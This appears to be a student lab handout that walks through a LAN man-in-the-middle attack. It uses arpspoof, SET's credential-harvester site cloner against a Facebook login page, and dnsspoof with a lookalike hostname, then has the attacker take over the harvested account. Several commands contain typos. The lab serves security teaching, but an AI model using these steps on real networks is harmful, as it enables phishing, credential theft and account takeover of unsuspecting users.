MITM requires 3 separate entities. The attacker, victim and web server. Since this is a lab there are multiple controlled variables like the attacker and victim reside on the same LAN subnet with a single gateway. Hence, we only need to spoof the victim and the gateway.

This Lab will be ran on Kali and Windows simultaneously. Kali user would be the attacker and Windows user would be the victim.

Note: Both these systems reside on the LAN subnet for pedagogical purpose of this lab.

? Retrieve IP addresses of the Windows machine (Victim/client) and the Web server.

? Open Common Prompt and type "ifconfig /all". Notate the MAC and IP address.

Would the attack work if the URL is secured? http vs https: ?

Note: you can include any valid website address.

? Switch the Kali.

? Open three Terminal windows to make the victim believe we are the web server and the server to believer we are the victim. Terminal can be found on the dock to the left by default. ? Enable IP forwarding - Type "echo >1 /proc/sys/ipv4/ip_forward"

Would be achieve the results without "ip_forward"? Why/Why not?

? Use "arpspoof" command:

Note: I have used the IP addresses of web server and victim's machine for explanation purposes only. Make sure to input the actual IP addresses of the victim and web server respectively.

? Arpspoof Victim to Server - Type in " arpspoof 192.168.1.15 192.168.1.1" , .15 belongs to the victim and .1 belongs to the server.

? Arpspoof server to victim - "arpspoof 192.168.1.1 192.168.1.15".

? Executing these commands enables switching, making the victim believe YOU, this host, the attacker is the server and server believe YOU are the victim (it's client)

Upload a screenshot after executing "arspoof" command to ensure the swap of the victim and server's address.

? Now, we will make a temporary server with the help of Social Engineering toolkit.

? Open a fresh terminal window and type in "setoolkit" to import the social engineering toolkit and press Enter.

Note: If this is your first time importing or using SET, you will have to accept the Terms and Conditions. To do so, type in "y" upon prompt.

To select any of the attacks/tools, press the co-related number followed by the enter key.

? In this lab, we will be using "Social-Engineering Attacks". Type "1" and press enter as shown elow. ? Next, Select "Website Attack Vectors". Type "2" and press enter. ? Next, Select "Credential Harvester Attack Method". Type "3" and press enter. ? Next, Select "Site Cloner". Type "2" and press enter.

? The system will prompt to put an IP address. Enter your, the attacker's, IP address followed by the website you would like to clone. In this case it is 192.168.1.18

? We chose Facebook but in reality, the attacker can chose any website, preferably with a username and password fields in the homepage.

? Once you press Enter, SET will start cloning the login page of that website. Your screen should look similar to the screenshot below. Note: While operating the SET at any given time you wish to go back or restart SET. Input "99".

Now that we have setup a temporary web server cloning the desired webpage, we can spoof the DNS to carry out a stealthy attack. DNS spoof will enable the attacker to re-name the cloned site to a appealing name which helps deceive the victim to open that webpage and enter their credentials. In other words, asking the victim to open 192.168.1.18 (attacker's IP) would result in getting caught. Instead, asking the victim to visit a webpage named different yet very close to the actual site. Like "logmein.facebook.com".

? Let's start the DNS spoofing process by creating a text file. To do so type the following in terminal and press enter. "pico hosts.txt"

? It will open a blank page. Type your IP (attacker's) IP followed by "space" followed by the name you wish to provide to the cloned (fake) webpage. For example: I used logmein.facebook.com ? Press "CTRL + X" (control and X) to save and exit. ? When the system prompts to save, Press "y". You will then be asked many other options as displayed below. Press Enter to exit the screen.

? Open a fresh terminal window and type the following command to start DNSspoof.

"dnsspoof -i eth0 -f hosts.txt" ? Switch to Windows and open a web browser.

? Navigate to the DNS name you gave to the cloned webpage and login with valid/invalid credentials.

Note: The reason you can use valid or invalid credentials is because, the purpose of this lab is to show you how to get/extract credentials. Since the victim would not know they are being attacked, by default they would enter their valid credentials.

What would happen after you input any (valid/invalid) credentials on the cloned website?

Switch back to Kali

? You should see the victim's credentials in the terminal window. Now the attacker can login with those credentials and change the password, disabling the client/victim to get access.

This scenario facilitated to gain the victim's credentials. What other scenarios can MITM be useful for? Name at least three.